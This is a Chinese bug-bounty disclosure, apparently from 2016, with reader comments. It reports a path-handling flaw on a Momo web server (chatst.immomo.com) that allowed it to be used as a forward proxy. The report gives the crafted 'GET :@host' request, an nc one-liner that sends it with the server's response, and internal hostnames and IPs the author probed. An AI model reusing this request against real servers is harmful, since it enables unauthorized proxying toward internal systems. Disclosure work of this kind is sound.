陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网)

存在问题的web服务器是 chatst.immomo.com:80

GET :@www.lijiejie.com/xss.js HTTP/1.1
 Host: chatst.immomo.com

如图，已经可以代理访问www.lijiejie.com

:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1/r/nHost: chatst.immomo.com/r/n/r/n" | nc chatst.immomo.com 80
 HTTP/1.1 200 OK
 Content-Length: 51
 Expires: Tue, 27 Sep 2016 08:22:10 GMT
 Server: MOMO
 Last-Modified: Tue, 26 Jan 2016 07:40:04 GMT
 Cache-Control: max-age=15552000
 Date: Thu, 31 Mar 2016 08:22:09 GMT
 Content-Type: application/octet-stream
 
 alert('XSS on ' + document.domain + '/n' + Date())

测试了几个IP地址，办公网打不通：

office.wemomo.com              172.16.7.3
 hermes.wemomo.com              10.80.103.160

但还是找了个不通的：

maven.wemomo.com               211.152.99.47

大家无法直接访问http://maven.wemomo.com的web服务，但是代理OK的。

web server正确处理path

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-04-01 19:20

厂商回复：

感谢lijiejie一直以来对陌陌的关注并多次提交高质量的漏洞，你的支持对我们也是一种鞭策，也希望大家继续帮助我们一起提高陌陌的安全水准。

最新状态：

2016-04-08：漏洞已修复，谢谢大家。

1. 2016-03-31 17:12 | 东方先生 ( 路人 | Rank:13 漏洞数:9 | 高冷吴大神的腿)

   1

   前排

   1# 回复此人

2. 2016-03-31 18:32 | sqlfeng ( 普通白帽子 | Rank:721 漏洞数:86 | 江山父老能容我,不使人间造孽钱)

   1

   姐姐猴赛雷

   2# 回复此人

3. 2016-04-02 11:14 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

   1

   为啥打不到也要写在标题上，猴赛雷～

   3# 回复此人

4. 2016-04-06 08:58 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 有活跃团队要人么？求带飞)

   1

   姐姐猴赛雷

   4# 回复此人

5. 2016-04-09 00:56 | depycode ( 普通白帽子 | Rank:299 漏洞数:53 | 关注网络安全，提高技术！)

   1

   怎么确定是代理服务器的啊？

   5# 回复此人

6. 2016-04-09 10:12 | Budi ( 普通白帽子 | Rank:213 漏洞数:44 | 希望能成为一个合格的白帽子，不断完善自己...)

   1

   666

   6# 回复此人

7. 2016-04-09 12:08 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习，多挖洞！)

   1

   姐姐收徒弟吗？

   7# 回复此人

8. 2016-04-09 15:47 | 雅柏菲卡 ( 普通白帽子 | Rank:1299 漏洞数:259 | 雙魚座聖鬥士雅柏菲卡)

   1

   姐姐 霸氣啊

   8# 回复此人

9. 2016-04-11 17:59 | 独孤小白兔 ( 路人 | Rank:14 漏洞数:5 )

   1

   这样的漏洞怎么发现的呢~~~

   9# 回复此人

10. 2016-06-14 23:30 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    0

    这样的漏洞怎么发现的呢~~~ 没见过这个类型的,squid只玩过这个的

    10# 回复此人